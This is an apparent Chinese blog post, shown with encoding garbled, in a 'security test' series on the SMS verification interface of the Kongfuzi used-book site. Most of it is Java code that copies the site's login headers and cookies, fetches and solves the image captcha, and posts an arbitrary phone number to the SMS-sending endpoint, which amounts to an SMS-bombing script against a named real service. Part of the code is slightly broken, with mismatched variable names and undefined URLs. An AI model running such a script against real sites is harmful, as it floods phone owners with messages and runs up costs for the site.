短信測(cè)評(píng)系列:孔夫子舊書網(wǎng)短信接口安全測(cè)試,你的短信接口被攻擊到底有多危險(xiǎn),可能瞬間損失過(guò)萬(wàn),短信接口防盜刷測(cè)試
發(fā)布時(shí)間:2021-04-10 點(diǎn)擊數(shù):3430
安全問(wèn)題不容忽視,不要亡羊補(bǔ)牢!
//配置請(qǐng)求頭
public Object setHeads(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> inheads,
LinkedHashMap<String, String> outheads, Hashtable<String, String> input) {
getCookie(cookieStore, httpclient, "https://login.kongfz.com/register/index.html", inheads, outheads);
String cookieStr = GetCookieHead.CookieHashToString(outheads);
if (cookieStr != null) {
inheads.put("Cookie", cookieStr);
}
inheads.put("Host", "login.kongfz.com");
inheads.put("Accept", "application/json, text/javascript, */*; q=0.01");
inheads.put("Origin", "https://login.kongfz.com");
inheads.put("X-Requested-With", "XMLHttpRequest");
inheads.put("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
inheads.put("Referer", "https://login.kongfz.com/Pc/Login/iframe");
return inheads;
}
//配置請(qǐng)求參數(shù)
public Object setParams(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> inheads, LinkedHashMap<String, String> outheads, Hashtable<String, String> input, String phone) {
List<BasicNameValuePair> paramList = new ArrayList<>();
paramsList.add(new BasicNameValuePair("mobile", phone));
paramsList.add(new BasicNameValuePair("captchaCode", input.get("imgCode")));
paramsList.add(new BasicNameValuePair("bizType", "2"));
return paramList;
}
//配置請(qǐng)求
public RetEntity reg(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> input, String phone) {
Hashtable<String, String> inheads = new Hashtable<>();
LinkedHashMap<String, String> outheads = new LinkedHashMap<>();
String imgCode = this.getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads, input,
imgOutMap);
input.put("imgCode", imgCode != null ? imgCode : "");
retEntity = this.userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);
return retEntity;
}